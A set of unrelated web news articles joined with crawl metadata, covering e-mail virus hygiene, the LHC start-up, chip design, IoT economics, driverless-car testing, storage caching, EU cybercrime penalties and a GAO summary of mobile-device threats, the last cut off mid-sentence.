the nickname of a well-known virus hoax, thus, users-believing it is fine to do so-will open the attached file and get infected. At this time, we would like to remind you of the Golden Rule in regards to computer hygiene: Do not, under any circumstances, open any attached files received from unknown sources. You should be careful even with messages received from the people you know: many viruses send out infected files from affected computers in a way a user simply doesn't realize. Thus, if you consider the message to be unexpected and strange (for instance, a love letter from your boss), then it is better to check whether the sender has really sent the file, and to be sure his computer is not infected. "Perhaps, some will consider it strange, but some paranoia is an essential part of computer security, especially when dealing with e-mail," said Den Zenkin, Head of Corporate Communications for Kaspersky Lab.
<urn:uuid:114d0d7d-c787-4012-9988-02555eb98220>
CC-MAIN-2017-09
http://www.kaspersky.com/au/about/news/virus/2000/If_You_ve_Got_Mail_
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169769.33/warc/CC-MAIN-20170219104609-00018-ip-10-171-10-108.ec2.internal.warc.gz
en
0.965182
782
2.796875
3
Scientists Start Biggest Physics ExperimentBy Reuters - | Posted 2008-09-10 Email Print Experiments using the Large Hadron Collider (LHC), the biggest and most complex machine ever made, could revamp modern physics and unlock secrets about the universe and its origins. The project has had to work hard to deny suggestions by some critics that the experiment could create tiny black holes of intense gravity that could suck in the whole planet. GENEVA (Reuters) - International scientists celebrated the successful start of a huge particle-smashing machine on Wednesday aiming to recreate the conditions of the "Big Bang" that created the universe. Experiments using the Large Hadron Collider (LHC), the biggest and most complex machine ever made, could revamp modern physics and unlock secrets about the universe and its origins. The project has had to work hard to deny suggestions by some critics that the experiment could create tiny black holes of intense gravity that could suck in the whole planet. Such fears, fanned by doomsday writers, have spurred huge interest in particle physics before the machine's start-up. Leading scientists have dismissed such concerns as "nonsense." The debut of the machine that cost 10 billion Swiss francs ($9 billion) registered as a blip on a control room screen at CERN, the European Organization for Nuclear Research, at about 9:30 a.m. (3:30 a.m. EDT). "We've got a beam on the LHC," project leader Lyn Evans told his colleagues, who burst into applause at the news. The physicists and technicians huddled in the control room cheered loudly again an hour later when the particle beam completed a clockwise trajectory of the accelerator, successfully completing the machine's first major task. Eventually, the scientists want to send beams in both directions to create tiny collisions at nearly the speed of light, an attempt to recreate on a miniature scale the heat and energy of the Big Bang, a concept of the origin of the universe that dominates scientific thinking. The Big Bang is thought to have occurred 15 billion years ago when an unimaginably dense and hot object the size of a small coin exploded in a void, spewing out matter that expanded rapidly to create stars, planets and eventually life on Earth. Problems with the LHC's magnets caused its temperature -- which is kept at minus 271.3 degrees Celsius (minus 456.3 degrees Fahrenheit) -- to fluctuate slightly, delaying efforts to send a particle beam in the counter-clockwise direction. The beam started its progression and then was halted. "This is a hiccup, not a major thing," Rudiger Schmidt, CERN's head of hardware commissioning, told reporters, adding the second rotation should be completed on Wednesday afternoon. Evans, who wore jeans and running shoes to the start-up, declined to say when those high-energy clashes would begin. "I don't know how long it will take," he said. "I think what has happened this morning bodes very well that it will go quickly ... This is a machine of enormous complexity. Things can go wrong at any time. But this morning we had a great start." Once the particle-smashing experiment gets to full speed, data measuring the location of particles to a few millionths of a meter, and the passage of time to billionths of a second, will show how the particles come together, fly apart, or dissolve. It is in these conditions that scientists hope to find fairly quickly a theoretical particle known as the Higgs Boson, named after Scottish scientist Peter Higgs who first proposed it in 1964, as the answer to the mystery of how matter gains mass. Without mass, the stars and planets in the universe could never have taken shape in the eons after the Big Bang, and life could never have begun -- on Earth or, if it exists as many cosmologists believe, on other worlds either. © Thomson Reuters 2008 All rights reserved
<urn:uuid:391be7b8-2efd-4435-a97a-565fdb1b9d19>
CC-MAIN-2017-09
http://www.baselinemag.com/c/a/Infrastructure/Scientists-Start-Biggest-Physics-Experiment
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171971.82/warc/CC-MAIN-20170219104611-00422-ip-10-171-10-108.ec2.internal.warc.gz
en
0.946339
813
3.34375
3
There's no two ways around it: The PC is slowing down with age. That may be a bit harsh--computers are faster and smaller than ever before--but processor performance simply isn't advancing at its past breakneck pace. At one time, 50 to 60 percent leaps in year-to-year performance were commonplace. Now, 10 to 15 percent improvements are the norm. Luckily, five-plus-year-old computers can still tackle everyday tasks just fine, so the performance slowdown isn't a huge issue. Plus, it's nice not having to replace your PC every other year during a down economy. But technology doesn't advance by sticking to the status quo. The future needs speed! Fortunately, the biggest names in PC processors aren't satisfied with the status quo. Chip makers are working furiously to solve the problems posed by a slowing Moore's Law and the rise of the power wall, in a bid to keep the performance pedal to the metal. So what kinds of radical tricks do they have up their sleeves? Several different kinds, actually--and each holds great potential for the future. Let's take a look behind the curtain. Intel: Building on the shoulders of giants Can we chalk up today's paltry performance gains to a breakdown in Moore's Law? Not quite. Moore's legendary line might be frequently misquoted to talk about CPU performance, but the letter of the Law revolves around the number of transistors on a circuit doubling every two years. While other chip makers have struggled to shrink transistors and squeeze more of them onto a chip, Intel--the company Moore himself cofounded--has kept pace with Moore's Law since its utterance, an achievement that can be laid at the feet of Intel's small army of engineers. Not just any engineers, though. Clever engineers. As transistors become more tightly packed, heat and power-efficiency concerns become major problems. Now that transistors are reaching almost infinitesimally small sizes--each of the billion-plus transistors in Intel's Ivy Bridge chips measure 22 nanometers (nm), or roughly 0.000000866 inch--conquering those woes takes creative thinking. "There's no doubt it's getting hard," Intel technical manufacturing manager Chuck Mulloy said in a phone interview. "Really, really hard. I mean, we're at the atomic level." To keep progress a-rollin', Intel has made some significant changes to the base design of transistors over the past decade. In 2002, the company announced that it was switching to so-called "strained silicon," which increased chip performance by 10 to 20 percent by slightly deforming the structure of silicon crystals. Mo' power means mo' problems, though. Specifically, as transistors continue to shrink, they suffer from increased electron "leakage," which makes them far less efficient. Two recent tweaks combat that leakage in novel ways. Without getting too geeky, the company started by swapping out the transistors' standard silicon dioxide insulators in favor of more efficient "high-k metal-gate" insulators during its shift to the 45nm manufacturing process. It sounds simple, but it was actually a big deal. That was followed by an even more monumental change, with the introduction of "tri-gate" or "3D" transistor technology in Intel's current Ivy Bridge chips. Traditional "planar" transistors have a pair of "gates" on either side of the channels that carry electrons. Tri-gate transistors shattered that two-dimensional thinking with the addition of a third gate over the channel, connecting the two side gates. The design improves efficiency by reducing leakage while lowering power needs. Again, it sounds simple, but manufacturing three-dimensional transistors requires immense technical precision. At the moment, Intel is the only chip maker shipping processors with 3D transistors. So what's next for Intel? The company isn't telling. In fact, Mulloy says that any technology the company might use--like, say, the next-gen extreme ultraviolet lithography fabrication process--goes into a PR "black hole" years before Intel introduces it in its chips. But, he stressed, the past improvements discussed above don't just stop when they're introduced to the public. "People tend to think 'Intel used this, now they're on to the next thing,'" Mulloy said. "Strained silicon did not go away when we added the capabilities of high-k metal gate. High-k metal gate didn't go away when we went to tri-gate transistors--we're still building and improving on that. We're at the fourth generation of strained silicon, the third generation of high-k metal gate, and our upcoming 14nm chips will be the second generation of tri-gate." The best chip technology out there just keeps getting better, in other words. Oh, and for what it's worth, Intel thinks Moore's Law will continue unabated for at least two more transistor-shrink generations. AMD: Parallel computing all the way Intel isn't the only chip maker in town, though. Rather than betting purely on improvements to transistor technology, rival AMD thinks the future of performance hinges on cutting CPUs some slack by shifting some of the workload to other processors that might be better suited for particular tasks. Graphics processors, for example, smoke through tasks that require a multitude of simultaneous calculations, such as password cracking, Bitcoin mining, and many scientific uses. Ever heard of parallel computing? That's what we're talking about. "Going into smaller nodes on the transistor side increases [CPU] performance by 6 to 8 to maybe 10 percent, year to year," says Sasa Marinkovic, a senior technology marketing manufacturer at AMD. "But adding a GPU with GPU compute capabilities gives much larger gains. For example, for Internet Explorer 8 to IE9 the performance increase was 400 percent--four timesA the performance of the previous generation, and it's all thanks to [IE9's] GPU acceleration." "We see that type of performance leap playing within today's power envelope, or you can greatly lower the power envelope and see the same performance [you have today]," Marinkovic says. AMD has been inching toward a heterogeneous system architecture--as the method of distributing the workload amongst several processors on a single chip is called--in its popular accelerated processing units, or APUs, including the one powering the upcoming PlayStation 4 gaming console. APUs contain traditional CPU cores and a large Radeon graphics core on the same die, as shown in the block diagram above. The CPU and GPU in AMD's next-gen Kaveri APUs will share the same pool of memory, blurring the lines even further and offering even faster performance. AMD isn't the only chip maker backing the idea of parallel computing. The company was a founding member of the HSA Foundation, a consortium of top chip makers--albeitA sans Intel and Nvidia--that are working together to create standards that should hopefully make programming for parallel computing easier in the future. It's a good thing that industry-leading companies provide the backbone of the HSA Foundation's vision, because in order for the grand heterogeneous future of parallel computing to come to fruition, programs and applications need to be specifically written to take advantage of the hardware designs. "Software is the key," Marinkovic admits. "When you look at APUs with [full HSA compatibility] and without full HSA, the software will have to change. But it will be a change for the better...Where we want to get to is code-once, and use everywhere. Once you have the HSA architecture across all these different HSA Foundation companies, hopefully you'll be able to write a program for a PC and run it on your smartphone or tablet with some small tweaks or compilation." You can already find application processing interfaces (APIs) that enable parallel GPU computing, such as Nvidia's GeForce-centricA CUDA platform, the DirectCompute API baked into DirectX 11 on Windows system, and OpenCL, an open-source solution managed by the Khronos Group. Support for hardware acceleration is picking up among software developers, though most of the programs handle intensive graphics in some way. Internet Explorer and Flash are on the bandwagon, for instance. Just last week, Adobe announced it was adding OpenCL support for the Windows version of Premiere Pro. According to representatives, users with AMD discrete graphics card or APUs will be able to tap into that GPU acceleration to edit HD and 4K videos in real time, or export videos up to 4.3 times faster than the base nonaccelerated software. "I don't think there's any ifs or buts about this," Marinkovic says. "Heterogeneous architectures are the way of the future." OPEL: So long, silicon, hello, gallium arsenide! But is that future based on silicon technology, as today's computing is? Definitely, for the short term. Definitely not, in the long term. Sometime in the future--experts don't know exactly when--silicon will reach its limits and simply won't be able to be pushed any further. Chip makers will have to switch to another material. That day is a long way off, but researchers are already exploring alternatives. Graphene processors receive a lot of hype as a potential silicon successor, but OPEL Technologies thinks the future lies in gallium arsenide. OPEL has been fine-tuning the gallium arsenide technology at the heart of its POET (Planar Opto Electronic Technology) platform for more than 20 years, and the company has worked with BAE and the U.S. Department of Defense (among others) to validate it. While past processor forays into gallium arsenide have ended in mild disappointment, OPEL representatives say their proprietary technology is ready for the big time. OPEL only recently exited the R&D stage and hasn't tried to make itty-bitty transistors at Ivy Bridge's 20nm size, but the company claims that at 800nm, gallium arsenide processors are faster than today's silicon and use roughly half as much voltage. "If you wanted to match the speed of today's silicon processors, at roughly a 3GHz clock rate, you wouldn't have to go all the way down to 20 or 30 nanometers," says OPEL chief scientist Dr. Geoffrey Taylor. "Heck, you could probably hit that at 200nm." And that's using planar technology, not 3D transistors. One of the biggest problems any silicon alternative faces is that silicon is the most cutting-edge technology in the world, with billions invested in manufacturing silicon processors to maximum efficiency. It's going to be hard to convince Intel, AMD, ARM, and the HSA Foundation to drop all that for a new material. OPEL says its technology has a large overlap with current silicon fabrication methods. "It's scalable, and it's bolt-on to CMOS," says executive director Peter Copetti. "That's very important. In our discussions with different foundries and semiconductor companies, the first thing they ask is 'Do I have to retool my facilities?' The investment here is minimal because our system is complementary to what's out there right now." OPEL also says its wafers are reusable. The International Technology Roadmap for Semiconductors has identified gallium arsenide as a potential silicon replacement sometime between 2018 and 2026. There is still a ton of testing and transitioning to be done before gallium arsenide captures anyA of the mainstream PC processor market, but if even a fraction of OPEL's claims hold true, its technology could very well power the processors of the future. Striding toward a face-melting tomorrow So, after all that--whew!--you have a better idea of where the future of PC performance is headed. The initiatives from Intel, AMD, and OPEL each tackle big problems in decidedly different ways, but that's a good thing. You don't want all of your potential eggs in a single basket, after all. And best of all, if all those disparate pieces of the PC performance puzzle prove successful, they could theoretically merge in Voltron-like fashion to create an uber-powerful, GPU-assisted, tri-gate gallium arsenide processor that could blow the pants off even the beefiest of today's Core i7 processors. Today's performance curve may be flattening out, but the future has never looked so beastly. This story, "How Chipmakers are Breaking Moore's Law and Pushing PCs to Blistering New Levels" was originally published by PCWorld.
<urn:uuid:0218b628-ef68-4503-924c-e930cf1812a4>
CC-MAIN-2017-09
http://www.cio.com/article/2386817/hardware/how-chipmakers-are-breaking-moore-s-law-and-pushing-pcs-to-blistering-new-levels.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174215.11/warc/CC-MAIN-20170219104614-00122-ip-10-171-10-108.ec2.internal.warc.gz
en
0.948496
2,614
2.90625
3
GCN LAB IMPRESSIONS Heat sink revolution: Sandia Cooler smaller, quieter, 30X more efficient - By Greg Crowe - Jul 11, 2012 We all know that the main enemy to computer components' lifespan and performance is heat. Keeping heat out of the parts that make the computer work -- in particular the processor -- and sending it away has always been a challenge. It would be easy if you had the resources to sink your systems into stuff like liquid nitrogen, of course, but how many of us do? If you aren’t a Bond villain, the odds of that are pretty low. But Sandia National Laboratories may have come up with an answer: a new type of air-cooled heat exchanger for processors and other chips that normal folks and government agencies can use. Hot enough for you: Data center cooling system heats buildings The typical approach to cooling a computer is to have a heat sink made up of metal foils in physical contact with the chip, and a circular fan positioned to draw the hot air away from the heat sink. Unfortunately, this can create pockets of dead air among the foils, which of course just keep getting hotter. Researchers at Sandia have managed to combine the heat sink and fan into one with a rotating fin structure. Dubbed the Sandia Cooler, it looks like a set of curved heat sink foils that spiral out from the center in a clockwise pattern. When the array is spun counterclockwise, a mini vortex is created in the middle that draws air down into the structure and pushes it out along the curved channels between the foils. This, of course, cools the foils and keeps any air from forming pockets. Sandia said the cooler is 10 times smaller that current CPU coolers and 30 times more efficient. And it's more energy-efficient and significantly quieter to boot. More details about the project can be found in Sandia's presentation or in the video below.
<urn:uuid:dee9cbf2-71b1-4d5a-87d1-f0cb6f6c67d7>
CC-MAIN-2017-09
https://gcn.com/articles/2012/07/11/sandia-cooler-30-times-more-efficient-at-cooling-pcs.aspx?admgarea=TC_EmergingTech
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174215.11/warc/CC-MAIN-20170219104614-00122-ip-10-171-10-108.ec2.internal.warc.gz
en
0.925787
406
3.140625
3
The study estimates that the annual value of IoT applications may be equivalent -- in the best case -- to about 11% of the world's economy in 2025. That's based on a number of assumptions, including the willingness of governments and vendors to enable interoperability through policies and technologies. IOT is expected to deliver improvements to the reliability of machines, as well as to individual health and life overall. But it may also be intrusive on privacy, and while the IoT will create new jobs, it will cost some as well. Here are five major points from this report: - Business IoT applications, not consumer uses, will create more business value, according to McKinsey. No surprise here. Consumer applications such as connected toasters, coffee pots and home entertainment systems offer little in terms of real value -- but they do get attention. Enterprise IoT is being used to predict and avoid failures in high-value machinery, such as locomotives and magnetic resonance imaging (MRI) devices. It also allows business to switch from scheduled maintenance programs to condition-based maintenance, where service is performed as needed,l not based on a calendar. This increases equipment reliability and efficient deployment of personnel. - A major share of the IoT's financial gains are through avoided cost. For instance, doctors can use IoT to monitor a patient's health. If the person is a diabetic, careful monitoring may prevent hospitalizations. This includes the use not only of wearables but of devices that can be implanted, injected and ingested. - Virtual reality is part of IoT. Virtual reality goggles will observe and guide you step-by-step through an installation process at home and work. This capability will likely arrive first on factory floors and equipment repair shops, but eventually it'll be available at home. - McKinsey estimates that IoT's potential economic impact at between $3.9 trillion and $11.1 trillion globally per year by 2025. But interoperability accounts for about 40% of this potential value. Equipment makers now collect data performance info from their own machines, but interoperability with other systems will give an integrated view and improve predictive analysis in environments that use multiple systems. In a municipal setting, for instance, interoperability means that video, cell phone data and vehicle sensors could be used to monitor and optimize traffic flow. - The efficiency gains delivered by IoT will deliver a mixed bag of benefits for human workers. Better equipment monitoring and ubiquitous deployment of sensors may reduce injuries. It could also help eliminate some travel for employees who have to go to remote sites. But McKinsey warns, "some IoT applications in worksite environments substantially reduce the number of employees needed." This story, "5 facets of the coming Internet of Things boom" was originally published by Computerworld.
<urn:uuid:e38ce084-1d5b-4a5b-b6ce-4bd74996130a>
CC-MAIN-2017-09
http://www.itnews.com/article/2941106/internet-of-things/5-facets-of-the-coming-internet-of-things-boom.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169776.21/warc/CC-MAIN-20170219104609-00366-ip-10-171-10-108.ec2.internal.warc.gz
en
0.941263
555
2.59375
3
If you thought the Sun was round -- you'd be right. But astronomers this week said the Sun is so round it's nearly perfect in its roundness. So round that astronomers said if they scaled it to the size of a beach ball, it would be so round that the difference between the widest and narrow diameters would be much less than the width of a human hair. It's not that scientists didn't know the Sun was round mind you, they just didn't know how round. Using an instrument on NASA's Solar Dynamics Observatory satellite, astronomers said they were able to "measure the solar shape with unprecedented accuracy." The study, done by Jeff Kuhn and Isabelle Scholl of the Institute for Astronomy, University of Hawaii at Manoa; Rock Bush of Stanford University, and Marcelo Emilio of Universidade Estadual de Ponta Grossa, Brazil, says that the sun rotates every 28 days, and because it doesn't have a solid surface, it should be slightly flattened. It is this tiny flattening has been studied with many instruments for almost 50 years to learn about the sun's rotation, especially the rotation below its surface, which we can't see directly, Kuhn said. He added that this solar flattening is remarkably constant over time and too small to agree with that predicted from its surface rotation. This suggests that other subsurface forces, like solar magnetism or turbulence, may be a more powerful influence than expected. "For years we've believed our fluctuating measurements were telling us that the sun varies, but these new results say something different. While just about everything else in the sun changes along with its 11-year sunspot cycle, the shape doesn't," Kuhn said. Layer 8 Extra Check out these other hot stories:
<urn:uuid:fc45adf3-46b2-410c-a457-16060870d2f1>
CC-MAIN-2017-09
http://www.networkworld.com/article/2222977/security/scientists-find-that-the-sun-is-so-round--it-s-scary.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169776.21/warc/CC-MAIN-20170219104609-00366-ip-10-171-10-108.ec2.internal.warc.gz
en
0.97221
366
3.96875
4
The Internet must support the large number of languages in the world at all levels, including content, hardware, software, and internationalized domain names if it is to reach the next billion people, according to speakers at an Internet Governance Forum (IGF) in Hyderabad, India. "When we talk about Internet for all, we have to go beyond the people who speak English," said Manal Ismail, vice chair of the Governmental Advisory Committee (GAC) of the Internet Corporation for Assigned Names and Numbers (ICANN), on Wednesday. Read full story: Network World |Data Center||Policy & Regulation| |DNS Security||Regional Registries| |Domain Names||Registry Services| |Intellectual Property||Top-Level Domains| |Internet of Things||Web| |Internet Protocol||White Space| Afilias - Mobile & Web Services
<urn:uuid:8897d88d-9e07-458b-b4e9-34c39d4e93c0>
CC-MAIN-2017-09
http://www.circleid.com/posts/igf_next_billion_internet_multilingual_support/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170864.16/warc/CC-MAIN-20170219104610-00066-ip-10-171-10-108.ec2.internal.warc.gz
en
0.707777
186
2.53125
3
GCN LAB IMPRESSIONS Wireless power charging: Tesla's 19th-century idea finally catching on - By Greg Crowe - Jun 27, 2012 Everyone knows what a pain it is to have to plug in their electronic devices for recharging. Or, more accurately, to remember to plug said devices in, and then try to remember where the blasted charger is. And the problem can be compounded when you own multiple wireless devices, as a lot of people today do. And then there’s the disposal problem seemingly every time you get a new device. The landfill space that was supposed to be saved by fewer batteries being thrown away has ended up being filled by old power adapters instead. Fortunately for us, wireless recharging has come along, in the form of those fancy pads that can charge phones sitting nearby, and they are making some headway in the electronic device market. Right now they work, but their range is limited. Image courtesy of PowerbyProxi. More info here. Wireless recharging is an idea we’d love to see catch on. But how revolutionary is it? Actually, Nicola Tesla published patents for wireless power transmission in the 1890s, and even dreamed of intercontinental wireless transmission of industrial power. But like many radical ideas, a lot of Tesla’s weren’t implemented until much, much later. It wasn’t until early in this century that work began on the magnetic induction pads that enable you to recharge a compatible device just by laying it on the pad. And only a few years ago, in 2009, the Wireless Power Consortium was founded and began developing standards for wireless power transmission. Now, more and more new devices are equipped to handle wireless recharging. You can even retrofit your old smart phone to recharge that way. Public recharging stations are becoming even more prevalent in some forward-thinking cities. Soon, recharging cords will be a thing of the past, and we will send the last of them to the landfill. This just goes to show that, when a revolutionary scientist like Tesla says something, we should listen, even 120 years later. Often, the one thing that keeps most ideas like this from being implemented immediately is a material or component that is either not common enough or too costly or difficult to manufacture. Later, when we get to the point where that is no longer a problem, we tend to forget about older patents that could take advantage of the new development. I don’t know whether there is a solution here, since there are a lot of patents that would need to be revisited every few years or so. But hopefully other good ideas won’t take more than 100 years to see fruition. Greg Crowe is a former GCN staff writer who covered mobile technology.
<urn:uuid:4c51d9ec-f165-4d42-a88d-962df6942b18>
CC-MAIN-2017-09
https://gcn.com/articles/2012/06/27/wireless-power-adapters-tesla-idea-catches-on.aspx?admgarea=TC_Mobile
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171070.80/warc/CC-MAIN-20170219104611-00242-ip-10-171-10-108.ec2.internal.warc.gz
en
0.958081
577
2.875
3
Cyber criminals could face tougher penalties across the European Union under new rules adopted by the European Parliament, which include the creation of a specific offence of using botnets. The draft directive adopted by the parliament on Thursday defines specific criminal offences for cybercrime and sets specific sanctions for each. It also requires E.U. countries to assist fellow member states and respond to urgent requests for help within eight hours in the event of a cyber attack. The text has already been informally agreed with member states, and that agreement is expected to be formalized shortly. The member states will the have two years to implement it in national law. Under the draft law, using botnets to establishing remote control over a significant number of computers by infecting them with malicious software carries a penalty of at least three years' imprisonment. Meanwhile criminals responsible for cyber attacks against "critical infrastructure", such as power plants, transport networks and government network would face at least five years in jail. The same would apply A if an attack is committed by a criminal organisation or if it causes serious damage. "Attacks against information systems pose a growing challenge to businesses, governments and citizens alike. Such attacks can cause serious damage and undermine users' confidence in the safety and reliability of the Internet," said Home Affairs Commissioner, Cecilia MalmstrAPm, welcoming the news. Companies or organizations would also be liable for offences committed for their benefit, for example hiring a hacker to get access to a competitor's database. The directive, which updates rules that have been in place since 2005, also requires member states to allow judges the possibility to sentence criminals to two years in jail for the crimes of illegally accessing or interfering with information systems, illegally interfering with data, illegally intercepting communications or intentionally producing and selling tools used to commit these offences. Minor cases are excluded, but it is up to each country to determine what constitutes a "minor" case. However technology blogger Glynn Moody expressed concern about possible mission-creep. "I predict laws will be abused by E.U. governments to attack coders and geeks," he said on Twitter. The directive will apply across all E.U. member states with the exception of Denmark, which decided to opt out.
<urn:uuid:b47f14b9-ab11-4f0a-b5a1-29b104e76db6>
CC-MAIN-2017-09
http://www.cio.com/article/2384366/legal/eu-parliament-approves-stricter-penalties-for-cyber-attacks.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172017.60/warc/CC-MAIN-20170219104612-00118-ip-10-171-10-108.ec2.internal.warc.gz
en
0.959324
457
2.578125
3
The University of Michigan is building a 32-acre simulated city center complete with building facades, stoplights, intersections, traffic circles, and even construction sites to test driverless cars. The simulated city, scheduled to be open this fall, will let researchers test how automated and networked vehicles respond to various and dangerous traffic situations and road conditions. Having a spot where researchers can evaluate the safety of autonomous systems is a critical step in getting self-driving cars on the road. "The type of testing we're talking about doing, it's not possible to do today in the university infrastructure," said Ryan Eustice, associate professor of naval architecture and marine engineering, in a statement. "Every time a vehicle comes around the loop, it can hit something unusual. That will give us a leg up on getting these vehicles mature and robust and safe." There's an increasing amount of attention being paid to creating fully autonomous cars. Sure, the auto industry has cars on the market that can parallel park themselves and alert the driver if they're about to back up into something. However, Google, for instance, is working on creating fully driverless cars. The company has been road testing these cars for several years, having them drive on highways and, more recently, on city streets. The University of Michigan's new test facility is set up to model the kind of networked and automated automobiles that university researchers expect to find in Ann Arbor by 2021. A networked vehicle communicates with other vehicles in the area, sharing information about traffic speeds, jams and detours. Both networked and autonomous cars should dramatically reduce crashes, ease traffic and reduce pollution. There's no word yet on whether Google will be one of the companies using the test facility. However, the university announced that Ford will be testing its Fusion hybrid there. University scientists are working with Ford engineers to develop sensors and mapping technology for the vehicle. The facility is being built to include merge lanes, road signs, railroad crossings and even mechanical pedestrians. Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her email address is email@example.com. Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center. This story, "University building simulated city to test driverless cars" was originally published by Computerworld.
<urn:uuid:cfa0fff1-f400-4613-b9dc-c6126a63ece1>
CC-MAIN-2017-09
http://www.itworld.com/article/2695369/hardware/university-building-simulated-city-to-test-driverless-cars.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172017.60/warc/CC-MAIN-20170219104612-00118-ip-10-171-10-108.ec2.internal.warc.gz
en
0.950638
510
3.125
3
Many of the caching systems on the market tend to focus on a particular platform. Some, for example, only accelerate VMware environments, others a specific operating system. The key is to find one that will fix your particular I/O problem. For example, if your problem area is VMware, then look for caching systems that specifically support VMware. If you have a Microsoft SQL performance problem then you may be better served by finding a file aware or even SQL aware system. [ What else do you need? Read Is Scale-Out Storage A Must Have? ] In addition to supporting the specific platform you need to accelerate, the other consideration is the storage protocol that the platform uses. Caching is a relatively low level I/O activity so these systems need to understand what is happening at a protocol level. As a result, you will see that each of the caching systems will often support a specific protocol. For example, if you are hosting your VMware images on NFS, then look for a caching system that will support NFS. In-Server or In-Network An area of confusion with server caching systems is where should the caching occur? Some systems leverage memory-based storage in the server and others are network based. The network-based systems were originally a caching appliance installed between the servers and the storage. It acted as a shock absorber for read traffic. Increasingly, though, we are seeing the systems that network the flash storage that is already installed in the servers, essentially aggregating them into a common pool of storage. The obvious differentiator between the implementation types (server vs. network) is that in-server systems are less dependent on the speed and quality of a network in order to maintain performance. But the capacity of memory storage of in-server systems may not be used as efficiently since that capacity is captive to a single host. Also, in-server systems can have performance issues in VMware environments when a VM is migrated. Network systems may introduce latency but they are more resilient to flash or server failure and typically have less issues when VMs are migrated to other servers. Block vs. File A final consideration is if the cache is going to be file based or block based. Block-based systems work independent of the files being accessed and move the most active blocks of data into the cache. This capability makes implementation easier in a virtualized environment because the cache can work across VMs. File-based systems are more aware, and allow for specific files to be monitored and accelerated, in some cases even pinned to the cache storage area. Using a file-based cache may mean either installing inside the caching software inside the Guest OS or leveraging a separate NFS share, but they may be more efficient since they can focus only on the files that need accelerating. As a result, they may require a smaller investment in SSD capacity and therefore less expensive. Some manual interaction is typically required to get this efficiency so there has to be available IT staff to fine-tune them. Off-storage system caching is a crowded market and we encounter another new vendor at least once a week. There are plenty of good off-storage caching systems but no perfect solutions. The key for product selection is to look for a system that covers your specific performance need. Until the market matures you may also find it better to use two or three systems in your data center based on what needs acceleration.
<urn:uuid:f992ee70-2ec1-45c8-bcf3-d2f0acde52e5>
CC-MAIN-2017-09
http://www.networkcomputing.com/storage/how-pick-right-storage-caching-system/930915484?cid=sbx_bigdata_related_mostpopular_data_protection_big_data&itc=sbx_bigdata_related_mostpopular_data_protection_big_data&piddl_msgorder=
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00062-ip-10-171-10-108.ec2.internal.warc.gz
en
0.945628
689
2.546875
3
The lineup of depressing security stats in a recent report by the Government Accountability Office on the mobile devices is growing. - The number of variants of malicious software aimed at mobile devices has reportedly risen from about 14,000 to 40,000 or about 185% in less than a year. - New mobile vulnerabilities have been increasing, from 163 in 2010 to 315 in 2011, an increase of over 93%; - An estimated half million to one million people had malware on their Android devices in the first half of 2011; - Three out of 10 Android owners are likely to encounter a threat on their device each year as of 2011; - According to Juniper Networks, malware aimed at mobile devices is increasing. For example, the number of variants of malicious software, known as "malware," aimed at mobile devices has reportedly risen from about 14,000 to 40,000, a 185 percent increase in less than a year. "Threats to the security of mobile devices and the information they store and process have been increasing significantly. Cyber criminals may use a variety of attack methods, including intercepting data as they are transmitted to and from mobile devices and inserting malicious code into software applications to gain access to users' sensitive information. These threats and attacks are facilitated by vulnerabilities in the design and configuration of mobile devices, as well as the ways consumers use them. Common vulnerabilities include a failure to enable password protection and operating systems that are not kept up to date with the latest security patches," the GAO stated. The GAO said federal agencies and private companies have promoted secure technologies and practices through standards and public private partnership but that despite these efforts, safeguards have not been consistently implemented. The GAO report went on to define some of the attacks that are facing mobile device users. Some are old hat and have been a problem for large computer users for years, but some are unique to the mobile world. Take a look, from the GAO report: - Browser exploits: These exploits are designed to take advantage of vulnerabilities in software used to access websites. Visiting certain web pages and/or clicking on certain hyperlinks can trigger browser exploits that install malware or perform other adverse actions on a mobile device. - Data interception: Data interception can occur when an attacker is eavesdropping on communications originating from or being sent to a mobile device. Electronic eavesdropping is possible through various techniques, such as (1) man-in-the-middle attacks, which occur when a mobile device connects to an unsecured WiFi network and an attacker intercepts and alters the communication; and (2) WiFi sniffing, which occurs when data are sent to or from a device over an unsecured (i.e., not encrypted) network connection, allowing an eavesdropper to "listen to" and record the information that is exchanged. - Keystroke logging: This is a type of malware that records keystrokes on mobile devices in order to capture sensitive information, such as credit card numbers. Generally keystroke loggers transmit the information they capture to a cyber criminal's website or e-mail address. - Malware: Malware is often disguised as a game, patch, utility, or other useful third-party software application. Malware can include spyware (software that is secretly installed to gather information on individuals or organizations without their knowledge), viruses (a program that can copy itself and infect the mobile system without permission or knowledge of the user), and Trojans (a type of malware that disguises itself as or hides itself within a legitimate file). Once installed, malware can initiate a wide range of attacks and spread itself onto other devices. The malicious application can perform a variety of functions, including accessing location information and other sensitive information, gaining read/write access to the user's browsing history, as well as initiating telephone calls, activating the device's microphone or camera to surreptitiously record information, and downloading other malicious applications. Repackaging-the process of modifying a legitimate application to insert malicious code-is one technique that an attacker can use. - Unauthorized location tracking: Location tracking allows the whereabouts of registered mobile devices to be known and monitored. While it can be done openly for legitimate purposes, it may also take place surreptitiously. Location data may be obtained through legitimate software applications as well as malware loaded on the user's mobile device. - Network exploits: Network exploits take advantage of software flaws in the system that operates on local (e.g., Bluetooth, WiFi) or cellular networks. Network exploits often can succeed without any user interaction, making them especially dangerous when used to automatically propagate malware. With special tools, attackers can find users on a WiFi network, hijack the users' credentials, and use those credentials to impersonate a user online. Another possible attack, known as bluesnarfing, enables attackers to gain access to contact data by exploiting a software flaw in a Bluetooth-enabled device. - Phishing: Phishing is a scam that frequently uses e-mail or pop-up messages to deceive people into disclosing sensitive information. Internet scammers use e-mail bait 